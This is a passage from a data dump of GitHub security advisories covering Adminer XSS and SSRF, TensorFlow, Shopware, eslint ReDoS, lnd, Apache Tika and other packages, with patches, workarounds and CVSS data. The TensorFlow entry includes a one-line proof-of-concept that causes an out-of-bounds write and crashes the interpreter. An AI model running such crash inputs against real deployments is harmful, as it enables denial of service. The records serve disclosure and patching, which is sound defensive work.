+1.4.0,GHSA-9pgx-gcph-mpqr,2023-09-21T19:59:45Z,2021-02-11T20:42:28Z,,['CVE-2020-35572'],vrana/adminer via XSS in the history parameter in SQL command,"### Impact +Users of Adminer versions supporting SQL command (most versions, e.g. MySQL) using browsers not encoding URL parameters before sending to server (likely Edge, not Chrome, not Firefox) are affected. + +### Patches +Patched by 5c395afc, included in version [4.7.9](https://github.com/vrana/adminer/releases/tag/v4.7.9). + +### Workarounds +Use browser which encodes URL parameters (e.g. Chrome or Firefox). + +### References +https://sourceforge.net/p/adminer/bugs-and-features/775/ + +### For more information +If you have any questions or comments about this advisory: +* Comment at https://sourceforge.net/p/adminer/bugs-and-features/775/ +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'vrana/adminer'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.7.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vrana/adminer/security/advisories/GHSA-9pgx-gcph-mpqr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35572'}, {'type': 'WEB', 'url': 'https://github.com/vrana/adminer/commit/5c395afc098e501be3417017c6421968aac477bd'}, {'type': 'PACKAGE', 'url': 'https://github.com/vrana/adminer'}, {'type': 'WEB', 'url': 'https://sourceforge.net/p/adminer/bugs-and-features/775/'}, {'type': 'WEB', 'url': 'https://sourceforge.net/p/adminer/news/2021/02/adminer-479-released/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-11T20:39:01Z', 'nvd_published_at': '2021-02-09T18:15:00Z'}" +1.4.0,GHSA-4ph2-8337-hm62,2021-02-05T21:22:28Z,2021-02-08T17:43:49Z,,[],Key Caching behavior in the DynamoDB Encryption Client.,"### Impact +This advisory concerns users of MostRecentProvider in the DynamoDB Encryption Client with a key provider like AWS Key Management Service that allows for permissions on keys to be modified. + +When key usage permissions were changed at the key provider, time-based key reauthorization logic in MostRecentProvider did not reauthorize the use of the key. This created the potential for keys to be used in the DynamoDB Encryption Client after permissions to do so were revoked at the key provider. + +### Patches +Fixed as of 1.3.0. We recommend users to modify their code and adopt `CachingMostRecentProvider`. + + +### Workarounds +Users who cannot upgrade to use the `CachingMostRecentProvider` can call `clear()` on the cache to manually flush all of its contents. Next use of the key will force a re-validation to occur with the key provider.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'dynamodb-encryption-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/aws/aws-dynamodb-encryption-python/security/advisories/GHSA-4ph2-8337-hm62'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-dynamodb-encryption-python/commit/90606ec9af7c2b5cb338d64639a62ee867d38d6b'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-dynamodb-encryption-python/blob/master/CHANGELOG.rst#130----2021-02-04'}, {'type': 'WEB', 'url': 'https://pypi.org/project/dynamodb-encryption-sdk'}]","{'cwe_ids': ['CWE-862'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-02-05T21:22:28Z', 'nvd_published_at': None}" +1.4.0,GHSA-m56g-3g8v-2rxw,2021-02-11T20:37:00Z,2021-02-11T20:46:53Z,2021-02-11T20:36:42Z,[],XSS in Adminer,"**Withdrawn:** Duplicate of GHSA-9pgx-gcph-mpqr. + +Adminer before 4.7.9 allows XSS via the history parameter to the default URI.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'adminer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.7.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35572'}, {'type': 'WEB', 'url': 'https://github.com/vrana/adminer/commit/5c395afc098e501be3417017c6421968aac477bd'}, {'type': 'WEB', 'url': 'https://github.com/vrana/adminer'}, {'type': 'WEB', 'url': 'https://sourceforge.net/p/adminer/bugs-and-features/775/'}, {'type': 'WEB', 'url': 'https://sourceforge.net/p/adminer/news/'}, {'type': 'WEB', 'url': 'https://sourceforge.net/p/adminer/news/2021/02/adminer-479-released/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-10T18:26:24Z', 'nvd_published_at': None}" +1.4.0,GHSA-f2vv-h5x4-57gr,2021-10-05T16:12:44Z,2021-02-10T02:32:21Z,,[],Leak of information via Store-API,"### Impact +Leak of information via Store-API + +### Patches +We recommend to update to the current version 6.3.5.1. You can get the update to 6.3.5.1 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +The vulnerability could only be fixed by changing the API system, which involves a non-backward-compatible change. Only consumers of the Store-API should be affected by this change. Please check your plugins if you have it in use. Detailed technical information can be found in the upgrade information. + +https://github.com/shopware/platform/blob/v6.3.5.1/UPGRADE-6.3.md#6351 + +### Workarounds +For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. + +https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 + +### For more information +https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-f2vv-h5x4-57gr'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/blob/v6.3.5.1/UPGRADE-6.3.md#6351'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/shopware/platform'}]","{'cwe_ids': ['CWE-202'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-02-10T02:17:41Z', 'nvd_published_at': None}" +1.4.0,GHSA-43f8-p5w3-5m25,2023-09-21T19:57:49Z,2021-02-11T21:20:40Z,,['CVE-2018-7667'],vrana/adminer vulnerable to SSRF by connecting to privileged ports,"### Impact +All users are affected. + +### Patches +* Unsuccessfully patched by 0fae40fb, included in version [4.4.0](https://github.com/vrana/adminer/releases/tag/v4.4.0). +* Patched by 35bfaa75, included in version [4.7.8](https://github.com/vrana/adminer/releases/tag/v4.7.8). + +### Workarounds +Protect access to Adminer also by other means, e.g. by HTTP password, IP address limiting or by OTP [plugin](https://www.adminer.org/plugins/). + +### References +* http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt +* https://sourceforge.net/p/adminer/bugs-and-features/769/ +* https://gusralph.info/adminer-ssrf-bypass-cve-2018-7667/ (CVE-2020-28654) + +### For more information +If you have any questions or comments about this advisory: +* Comment at 35bfaa75.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'vrana/adminer'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.7.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vrana/adminer/security/advisories/GHSA-43f8-p5w3-5m25'}, {'type': 'WEB', 'url': 'https://github.com/vrana/adminer/commit/35bfaa75'}, {'type': 'WEB', 'url': 'https://gusralph.info/adminer-ssrf-bypass-cve-2018-7667'}, {'type': 'WEB', 'url': 'https://sourceforge.net/p/adminer/bugs-and-features/769/'}, {'type': 'WEB', 'url': 'http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-11T21:20:27Z', 'nvd_published_at': None}" +1.4.0,GHSA-jcgq-xh2f-2hfm,2021-02-25T01:20:42Z,2021-02-25T01:20:42Z,2021-02-25T01:20:42Z,[],Regular Expression Denial of Service,A vulnerability was descovered in eslint before 4.18.2. One of the regexes in eslint is vulnerable to catastrophic backtracking.,[],"[{'package': {'ecosystem': 'npm', 'name': 'eslint'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.18.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/eslint/eslint/issues/10002'}, {'type': 'WEB', 'url': 'https://github.com/eslint/eslint/commit/f6901d0bcf6c918ac4e5c6c7c4bddeb2cb715c09'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-19T22:01:29Z', 'nvd_published_at': None}" +1.4.0,GHSA-78hj-86cr-6j2v,2021-05-17T21:56:38Z,2021-05-18T15:30:22Z,,['CVE-2019-12999'],Improper Access Control in Lightning Network Daemon,Lightning Network Daemon (lnd) before 0.7 allows attackers to trigger loss of funds because of Incorrect Access Control.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/lightningnetwork/lnd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.1-beta'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.7.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12999'}, {'type': 'WEB', 'url': 'https://github.com/lightninglabs/chanleakcheck'}, {'type': 'WEB', 'url': 'https://github.com/lightningnetwork/lnd/commits/master'}, {'type': 'WEB', 'url': 'https://github.com/lightningnetwork/lnd/releases/tag/v0.7.0-beta'}, {'type': 'WEB', 'url': 'https://lists.linuxfoundation.org/pipermail/lightning-dev/2019-September/002174.html'}]","{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:56:38Z', 'nvd_published_at': None}" +1.4.0,GHSA-3264-3fm9-fg44,2022-10-07T20:40:10Z,2021-05-07T15:54:00Z,,['CVE-2020-1951'],Infinite Loop in Apache Tika,A carefully crafted or corrupt PSD file can cause an infinite loop in Apache Tika's PSDParser in versions 1.0-1.23.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tika:tika'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.24'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.23'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1951'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tika'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd8c1b42bd0e31870d804890b3f00b13d837c528f7ebaf77031323172%40%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/03/msg00035.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4564-1/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}]","{'cwe_ids': ['CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T22:47:57Z', 'nvd_published_at': '2020-03-23T14:15:00Z'}" +1.4.0,GHSA-8pmx-p244-g88h,2021-05-17T21:25:08Z,2021-05-21T14:28:42Z,,['CVE-2021-29614'],Interpreter crash from `tf.io.decode_raw`,"### Impact +The implementation of `tf.io.decode_raw` produces incorrect results and crashes the Python interpreter when combining `fixed_length` and wider datatypes. + +```python +import tensorflow as tf + +tf.io.decode_raw(tf.constant([""1"",""2"",""3"",""4""]), tf.uint16, fixed_length=4) +``` + +The [implementation of the padded version](https://github.com/tensorflow/tensorflow/blob/1d8903e5b167ed0432077a3db6e462daf781d1fe/tensorflow/core/kernels/decode_padded_raw_op.cc) is buggy due to a confusion about pointer arithmetic rules. + +First, the code [computes](https://github.com/tensorflow/tensorflow/blob/1d8903e5b167ed0432077a3db6e462daf781d1fe/tensorflow/core/kernels/decode_padded_raw_op.cc#L61) the width of each output element by dividing the `fixed_length` value to the size of the type argument: + +```cc +int width = fixed_length / sizeof(T); +``` + +The `fixed_length` argument is also used to determine the [size needed for the output tensor](https://github.com/tensorflow/tensorflow/blob/1d8903e5b167ed0432077a3db6e462daf781d1fe/tensorflow/core/kernels/decode_padded_raw_op.cc#L63-L79): + +```cc +TensorShape out_shape = input.shape(); +out_shape.AddDim(width); +Tensor* output_tensor = nullptr; +OP_REQUIRES_OK(context, context->allocate_output(""output"", out_shape, &output_tensor)); + +auto out = output_tensor->flat_inner_dims(); +T* out_data = out.data(); +memset(out_data, 0, fixed_length * flat_in.size()); +``` + +This is followed by [reencoding code](https://github.com/tensorflow/tensorflow/blob/1d8903e5b167ed0432077a3db6e462daf781d1fe/tensorflow/core/kernels/decode_padded_raw_op.cc#L85-L94): + +```cc +for (int64 i = 0; i < flat_in.size(); ++i) { + const T* in_data = reinterpret_cast(flat_in(i).data()); + + if (flat_in(i).size() > fixed_length) { + memcpy(out_data, in_data, fixed_length); + } else { + memcpy(out_data, in_data, flat_in(i).size()); + } + out_data += fixed_length; +} +``` + +The erroneous code is the last line above: it is moving the `out_data` pointer by `fixed_length * sizeof(T)` bytes whereas it only copied at most `fixed_length` bytes from the input. This results in parts of the input not being decoded into the output. + +Furthermore, because the pointer advance is far wider than desired, this quickly leads to writing to outside the bounds of the backing data. This OOB write leads to interpreter crash in the reproducer mentioned here, but more severe attacks can be mounted too, given that this gadget allows writing to periodically placed locations in memory. + +### Patches +We have patched the issue in GitHub commit [698e01511f62a3c185754db78ebce0eee1f0184d](https://github.com/tensorflow/tensorflow/commit/698e01511f62a3c185754db78ebce0eee1f0184d). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-8pmx-p244-g88h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29614'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/698e01511f62a3c185754db78ebce0eee1f0184d'}]","{'cwe_ids': ['CWE-665', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:25:08Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-p6jh-p7q8-pcrg,2021-05-05T17:59:12Z,2021-05-06T18:26:21Z,,['CVE-2020-7722'],Prototype Pollution in nodee-utils,All versions of package nodee-utils below version 1.2.3 are vulnerable to Prototype Pollution via the deepSet function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nodee-utils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7722'}, {'type': 'WEB', 'url': 'https://github.com/nodee-apps/utils/commit/52460d936c52f03c9907bc99ac5e890970cef83c'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODEEUTILS-598679'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T17:59:12Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}" +1.4.0,GHSA-wcp5-m52f-mhh5,2022-09-08T14:05:32Z,2021-05-07T15:54:36Z,,['CVE-2020-25020'],Improper Restriction of XML External Entity Reference in MPXJ,"""MPXJ through 8.1.3 allows XXE attacks. This affects the GanttProjectReader and PhoenixReader components.""","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'net.sf.mpxj:mpxj'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25020'}, {'type': 'WEB', 'url': 'https://github.com/joniles/mpxj/pull/178/commits/c3e457f7a16facfe563eade82b0fa8736a8c96f9'}, {'type': 'PACKAGE', 'url': 'https://github.com/joniles/mpxj'}, {'type': 'WEB', 'url': 'https://github.com/joniles/mpxj/releases/tag/v8.1.4'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}]","{'cwe_ids': ['CWE-611'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:48:23Z', 'nvd_published_at': '2020-08-29T19:15:00Z'}" +1.4.0,GHSA-4gh8-x3vv-phhg,2023-01-10T16:09:36Z,2021-05-18T18:30:38Z,,['CVE-2021-29499'],Predictable SIF UUID Identifiers in github.com/sylabs/sif,"### Impact + +The `siftool new` command and [func siftool.New()](https://pkg.go.dev/github.com/sylabs/sif/pkg/siftool#New) produce predictable UUID identifiers due to insecure randomness in the version of the `github.com/satori/go.uuid` module used as a dependency. + +### Patches + +A patch is available in version >= v1.2.3 of the module. Users are encouraged to upgrade. + +The patch is commit https://github.com/sylabs/sif/commit/193962882122abf85ff5f5bcc86404933e71c07d + +### Workarounds +Users passing [CreateInfo struct](https://pkg.go.dev/github.com/sylabs/sif/pkg/sif#CreateInfo) should ensure the `ID` field is generated using a version of `github.com/satori/go.uuid` that is not vulnerable to this issue. Unfortunately, the latest tagged release is vulnerable to this issue. One way to obtain a non-vulnerable version is: + +``` +go get github.com/satori/go.uuid@75cca531ea763666bc46e531da3b4c3b95f64557 +``` + +### References +* https://github.com/satori/go.uuid/issues/73 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [github.com/sylabs/sif](https://github.com/sylabs/sif/issues/new) +* Email us at [security@sylabs.io](mailto:security@sylabs.io) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/sylabs/sif'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sylabs/sif/security/advisories/GHSA-4gh8-x3vv-phhg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29499'}, {'type': 'WEB', 'url': 'https://github.com/satori/go.uuid/issues/73'}, {'type': 'WEB', 'url': 'https://github.com/sylabs/sif/commit/193962882122abf85ff5f5bcc86404933e71c07d'}, {'type': 'PACKAGE', 'url': 'https://github.com/sylabs/sif'}]","{'cwe_ids': ['CWE-330', 'CWE-340'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T17:01:30Z', 'nvd_published_at': '2021-05-07T21:15:00Z'}" +1.4.0,GHSA-wjm3-fq3r-5x46,2023-08-30T11:38:17Z,2021-05-18T21:07:54Z,,['CVE-2020-36066'],github.com/tidwall/gjson is vulnerable to Denial of service,GJSON <1.6.5 allows attackers to cause a denial of service (remote) via crafted JSON.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/tidwall/gjson'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36066'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/issues/195'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/issues/195#issuecomment-755303148'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/commit/9f58baa7a613f89dfdc764c39e47fd3a15606153'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/match/commit/c2f534168b739a7ec1821a33839fb2f029f26bbc'}, {'type': 'PACKAGE', 'url': 'https://github.com/tidwall/gjson'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0957'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:00:38Z', 'nvd_published_at': None}" +1.4.0,GHSA-7qw8-847f-pggm,2023-02-14T17:41:32Z,2021-05-10T19:35:07Z,,['CVE-2021-20291'],Improper Locking in github.com/containers/storage,"A deadlock vulnerability was found in `github.com/containers/storage` in versions before 1.28.1. When a container image is processed, each layer is unpacked using `tar`. If one of those layers is not a valid `tar` archive this causes an error leading to an unexpected situation where the code indefinitely waits for the tar unpacked stream, which never finishes. An attacker could use this vulnerability to craft a malicious image, which when downloaded and stored by an application using containers/storage, would then cause a deadlock leading to a Denial of Service (DoS).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containers/storage'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.28.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20291'}, {'type': 'WEB', 'url': 'https://github.com/containers/storage/pull/860'}, {'type': 'WEB', 'url': 'https://github.com/containers/storage/commit/306fcabc964470e4b3b87a43a8f6b7d698209ee1'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1939485'}, {'type': 'PACKAGE', 'url': 'https://github.com/containers/storage'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R5D7XL7FL24TWFMGQ3K2S72EOUSLZMKL/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYOHNG2Q7DCAQZMGYLMENLKALGDLG3X/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WX24EITRXVHDM5M223BVTJA2ODF2FSHI/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNMB7O2UIXE34PGSCSOULGHPX5LIJBMM/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0100'}, {'type': 'WEB', 'url': 'https://unit42.paloaltonetworks.com/cve-2021-20291/'}]","{'cwe_ids': ['CWE-400', 'CWE-667'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T19:15:55Z', 'nvd_published_at': '2021-04-01T18:15:00Z'}" +1.4.0,GHSA-vh59-v9r5-4mh4,2023-09-08T19:18:38Z,2021-05-17T21:01:32Z,,['CVE-2020-7690'],Cross-site scripting in jspdf,Affected versions of this package are vulnerable to Cross-site Scripting (XSS). It's possible to inject JavaScript code via the `html` method.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jspdf'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7690'}, {'type': 'WEB', 'url': 'https://github.com/MrRio/jsPDF/issues/2795'}, {'type': 'WEB', 'url': 'https://github.com/parallax/jsPDF/issues/2862'}, {'type': 'WEB', 'url': 'https://github.com/parallax/jsPDF/issues/2971'}, {'type': 'WEB', 'url': 'https://github.com/parallax/jsPDF/pull/2806'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-575260'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-575258'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBMRRIO-575259'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-575257'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSPDF-575256'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-11T17:38:24Z', 'nvd_published_at': '2020-07-06T13:15:00Z'}" +1.4.0,GHSA-9vxv-wpv4-f52p,2021-05-18T16:06:57Z,2021-05-21T14:29:33Z,,[],Information leakage in Error Handler,"### Impact +Information leakage in Error Handler + +### Patches +We recommend updating to the current version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview. + +For older versions you can use the Security Plugin: +https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html + + +### References +https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-05-2021",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/shopware'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.6.9'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/shopware/security/advisories/GHSA-9vxv-wpv4-f52p'}]","{'cwe_ids': ['CWE-209'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T16:06:57Z', 'nvd_published_at': None}" +1.4.0,GHSA-wfwq-xc57-fq7v,2023-07-13T17:59:31Z,2021-05-25T15:59:14Z,,['CVE-2020-7639'],eivindfjeldstad-dot contains prototype pollution vulnerability,eivindfjeldstad-dot below 1.0.3 is vulnerable to Prototype Pollution.The function 'set' could be tricked into adding or modifying properties of 'Object.prototype' using a '__proto__' payload.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@eivifj/dot'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 